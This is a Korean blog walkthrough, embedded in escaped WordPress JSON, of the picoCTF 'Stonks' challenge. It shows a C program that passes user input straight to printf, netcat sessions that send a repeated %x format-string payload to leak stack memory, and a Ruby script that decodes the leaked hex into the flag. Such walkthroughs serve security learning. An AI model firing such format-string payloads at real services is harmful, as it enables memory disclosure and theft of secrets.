\uc870\ud68c\uc218: 25<\/p>
vuln.c \ud30c\uc77c\uc744 \uc5f4\uc5b4\ubcf4\uba74 C\ub85c \uc791\uc131\ub41c \ucf54\ub4dc\uac00 \ubcf4\uc778\ub2e4. \ubb50 \ud2b9\ubcc4\ud55c\uac74 \uc548\ubcf4\uc774\ub2c8\uae4c \uc81c\uc2dc\ub41c \uc11c\ubc84\uc5d0 \ub137\ucf13\uc73c\ub85c \uc811\uc18d\ud574\ubcf4\uc790.<\/p>\n \ub2e8\uc21c\ud788 vuln.c\uac00 \ucef4\ud30c\uc77c\ub418\uc5b4 \uc791\ub3d9\ub418\ub294 \uac78\ub85c \ubcf4\uc778\ub2e4. \uc544\ub9c8 \ucd9c\ub825 \uad00\ub828\ud574\uc11c \ucde8\uc57d\uc810\uc744 \ucc3e\uc544\uc57c \ud560 \uac83 \uac19\ub2e4. \ub2e4\uc2dc \ud55c\ubc88 vuln.c \ucf54\ub4dc\ub97c \uc0b4\ud3b4\ubcf4\uc790.<\/p>\n \ubc84\ud37c\ub97c \uadf8\ub300\ub85c \ucd9c\ub825\ud558\ub294 \ubd80\ubd84\uc774 \uc788\ub2e4.<\/p>\n \uc2ec\uc9c0\uc5b4 api\ub77c\ub294 \ud30c\uc77c\uc5d0 \uc788\ub294 \ud50c\ub798\uadf8 \uac12\uc744 \ubc84\ud37c\uc5d0 \uc800\uc7a5\ub3c4 \ud558\uace0...<\/p>\n \ub418\ub4e0 \uc548\ub418\ub294 \uc774 \ubd80\ubd84\uc744 \ud55c\ubc88 \uac74\ub4dc\ub824 \ubcf4\uc790.<\/p>\n \ub41c\ub2e4!! %x\ub85c \uba54\ubaa8\ub9ac\uc5d0 \uc788\ub358 93883f0 \ub77c\ub294 \uc815\ubcf4\ub97c \uac00\uc9c0\uace0 \uc654\ub2e4. \uadf8\ub7fc \uc81c\ub300\ub85c \ud574\ubcf4\uc790.<\/p>\n \uc77c\ub2e8 \ub098\uc628 \uc815\ubcf4\ub97c \uae01\uc5b4\ub2e4\uac00 \ubb38\uc790\ub85c \ubc14\uafd4\ubcf4\uc790.<\/p>\n \uc2e4\ud589\ud574 \ubcf4\uba74<\/p>\n \ubb18\ud558\uac8c \ud50c\ub798\uadf8 \uac19\uc544 \ubcf4\uc778\ub2e4. \uc2e4\ud589\ud558\uba74 \ubd88\ud544\uc694\ud55c \uae00\uc790\uac00 \ubd99\uc5b4\uc788\ub2e4. \uc9c1\uc804\uc5d0 \ub098\uc654\ub358 ocip{FTC0l_I4_t5m_ll0m_y_y3n4cdbae52}z@Z\\ \uc640 \ube44\uad50\ud574 \uc801\uc801\ud558\uac8c \ud50c\ub798\uadf8\ub97c \uc720\ucd94\ud574 \ubcf4\uc790.<\/p>\n \ub05d.<\/p>\n","protected":false},"excerpt":{"rendered":" \uc870\ud68c\uc218: 25\ubb38\uc81c I decided to try something noone else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's unsecure! vuln.c nc mercury.picoctf.net 53437 vuln.c \ud30c\uc77c\uc744 \uc5f4\uc5b4\ubcf4\uba74 C\ub85c \uc791\uc131\ub41c \ucf54\ub4dc\uac00 \ubcf4\uc778\ub2e4. \ubb50 \ud2b9\ubcc4\ud55c\uac74 \uc548\ubcf4\uc774\ub2c8\uae4c \uc81c\uc2dc\ub41c \uc11c\ubc84\uc5d0 \ub137\ucf13\uc73c\ub85c \uc811\uc18d\ud574\ubcf4\uc790. \u276f…Continue reading [picoCTF] Stonks \ud480\uc774<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[54,53],"class_list":["post-4865","post","type-post","status-publish","format-standard","hentry","category-computer","tag-ctf","tag-picoctf"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.photoguraphy.com\/index.php?rest_route=\/wp\/v2\/posts\/4865","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.photoguraphy.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.photoguraphy.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.photoguraphy.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.photoguraphy.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4865"}],"version-history":[{"count":3,"href":"https:\/\/www.photoguraphy.com\/index.php?rest_route=\/wp\/v2\/posts\/4865\/revisions"}],"predecessor-version":[{"id":4868,"href":"https:\/\/www.photoguraphy.com\/index.php?rest_route=\/wp\/v2\/posts\/4865\/revisions\/4868"}],"wp:attachment":[{"href":"https:\/\/www.photoguraphy.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4865"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.photoguraphy.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4865"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.photoguraphy.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4865"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}I decided to try something noone else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's unsecure! vuln.c nc mercury.picoctf.net 53437<\/code><\/p>\n
\n\u276f nc mercury.picoctf.net 53437\nWelcome back to the trading app!\n\nWhat would you like to do?\n1) Buy some stonks!\n2) View my portfolio\n\n<\/code><\/pre>\n char *user_buf = malloc(300 + 1);\n printf(\"What is your API token?\\n\");\n scanf(\"%300s\", user_buf);\n printf(\"Buying stonks with token:\\n\");\n printf(user_buf);\n<\/code><\/pre>\n char api_buf[FLAG_BUFFER];\n FILE *f = fopen(\"api\",\"r\");\n if (!f) {\n printf(\"Flag file not found. Contact an admin.\\n\");\n exit(1);\n }\n fgets(api_buf, FLAG_BUFFER, f);\n<\/code><\/pre>\n\u276f nc mercury.picoctf.net 53437\nWelcome back to the trading app!\n\nWhat would you like to do?\n1) Buy some stonks!\n2) View my portfolio\n1\nUsing patented AI algorithms to buy stonks\nStonks chosen\nWhat is your API token?\n%x\nBuying stonks with token:\n93883f0\nPortfolio as of Tue Dec 5 09:57:18 UTC 2023\n\n\n1 shares of CB\n3 shares of O\n16 shares of O\n510 shares of GS\n33 shares of LCF\n33 shares of OGC\n1143 shares of DNVH\n34 shares of WP\nGoodbye!\n<\/code><\/pre>\n\u276f nc mercury.picoctf.net 53437\nWelcome back to the trading app!\n\nWhat would you like to do?\n1) Buy some stonks!\n2) View my portfolio\n1\nUsing patented AI algorithms to buy stonks\nStonks chosen\nWhat is your API token?\n%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x \nBuying stonks with token:\n89093f0-804b000-80489c3-f7f3cd80-ffffffff-1-8907160-f7f4a110-f7f3cdc7-0-8908180-1-89093d0-89093f0-6f636970-7b465443-306c5f49-345f7435-6d5f6c6c-306d5f79-5f79336e-34636462-61653532-ffb8007d-f7f77af8-f7f4a440-5a5ccb00-1-0-f7dd9ce9-f7f4b0c0-f7f3c5c0-f7f3c000-ffb8ba08-f7dca68d-f7f3c5c0-8048eca-ffb8ba14-0-f7f5ef09-804b000-f7f3c000-f7f3ce20-ffb8ba48-f7f64d50-f7f3d890-5a5ccb00-f7f3c000-804b000-ffb8ba48-8048c86-8907160-ffb8ba34-ffb8ba48-8048be9-f7f3c3fc-0-ffb8bafc-ffb8baf4-1-1-8907160-5a5ccb00-ffb8ba60-0-0-f7d7ffa1-f7f3c000-f7f3c000-0-f7d7ffa1-1-ffb8baf4-ffb8bafc-ffb8ba84-1-0-f7f3c000-f7f5f70a-f7f77000-0-f7f3c000-0-0-daa38049-4298659-0-0-0-1-8048630-0-f7f64d50-f7f5f960-804b000-1-8048630-0-8048662-8048b85-\nPortfolio as of Tue Dec 5 10:34:46 UTC 2023\n\n\n1 shares of TQFP\n4 shares of LO\n2 shares of YDV\n161 shares of FGQW\n21 shares of L\n20 shares of H\n58 shares of IGT\n226 shares of SCHX\nGoodbye!\n<\/code><\/pre>\na = \"89093f0-804b000-80489c3-f7f3cd80-ffffffff-1-8907160-f7f4a110-f7f3cdc7-0-8908180-1-89093d0-89093f0-6f636970-7b465443-306c5f49-345f7435-6d5f6c6c-306d5f79-5f79336e-34636462-61653532-ffb8007d-f7f77af8-f7f4a440-5a5ccb00-1-0-f7dd9ce9-f7f4b0c0-f7f3c5c0-f7f3c000-ffb8ba08-f7dca68d-f7f3c5c0-8048eca-ffb8ba14-0-f7f5ef09-804b000-f7f3c000-f7f3ce20-ffb8ba48-f7f64d50-f7f3d890-5a5ccb00-f7f3c000-804b000-ffb8ba48-8048c86-8907160-ffb8ba34-ffb8ba48-8048be9-f7f3c3fc-0-ffb8bafc-ffb8baf4-1-1-8907160-5a5ccb00-ffb8ba60-0-0-f7d7ffa1-f7f3c000-f7f3c000-0-f7d7ffa1-1-ffb8baf4-ffb8bafc-ffb8ba84-1-0-f7f3c000-f7f5f70a-f7f77000-0-f7f3c000-0-0-daa38049-4298659-0-0-0-1-8048630-0-f7f64d50-f7f5f960-804b000-1-8048630-0-8048662-8048b85\"\n\na.split('-').each do |i|\n if i.length == 8\n a= [i].pack('H*').bytes\n a.each do |j|\n if 32<=j && j<128\n print j.chr\n end\n end\n end\nend\n\n<\/code><\/pre>\n\u276f ruby vuln.rb\nocip{FTC0l_I4_t5m_ll0m_y_y3n4cdbae52}z@Z\\ HMPZ\\H4HZ\\`pIMP`% \n<\/code><\/pre>\n
\n\uc798 \uc0b4\ud3b4\ubcf4\ub2c8 4\uae00\uc790 \ub2e8\uc704\ub85c \uc21c\uc11c\uac00 \ub4a4\uc9da\uc5b4\uc838 \uc788\ub294 \uac83\uc73c\ub85c \ubcf4\uc778\ub2e4.
\n\ucf54\ub4dc\ub97c \uc218\uc815 \u00b7 \ucd94\uac00\ud558\uc790.<\/p>\na = \"89093f0-804b000-80489c3-f7f3cd80-ffffffff-1-8907160-f7f4a110-f7f3cdc7-0-8908180-1-89093d0-89093f0-6f636970-7b465443-306c5f49-345f7435-6d5f6c6c-306d5f79-5f79336e-34636462-61653532-ffb8007d-f7f77af8-f7f4a440-5a5ccb00-1-0-f7dd9ce9-f7f4b0c0-f7f3c5c0-f7f3c000-ffb8ba08-f7dca68d-f7f3c5c0-8048eca-ffb8ba14-0-f7f5ef09-804b000-f7f3c000-f7f3ce20-ffb8ba48-f7f64d50-f7f3d890-5a5ccb00-f7f3c000-804b000-ffb8ba48-8048c86-8907160-ffb8ba34-ffb8ba48-8048be9-f7f3c3fc-0-ffb8bafc-ffb8baf4-1-1-8907160-5a5ccb00-ffb8ba60-0-0-f7d7ffa1-f7f3c000-f7f3c000-0-f7d7ffa1-1-ffb8baf4-ffb8bafc-ffb8ba84-1-0-f7f3c000-f7f5f70a-f7f77000-0-f7f3c000-0-0-daa38049-4298659-0-0-0-1-8048630-0-f7f64d50-f7f5f960-804b000-1-8048630-0-8048662-8048b85\"\n\nr=\"\"\n\na.split('-').each do |i|\n if i.length == 8\n a= [i].pack('H*').bytes\n a.each do |j|\n if 32<=j && j<128\n r += j.chr\n end\n end\n end\nend\n\nr2 = r.scan(\/.{4}\/)\nr3 = r2.map(&:reverse).join\n\nputs r3\n<\/code><\/pre>\n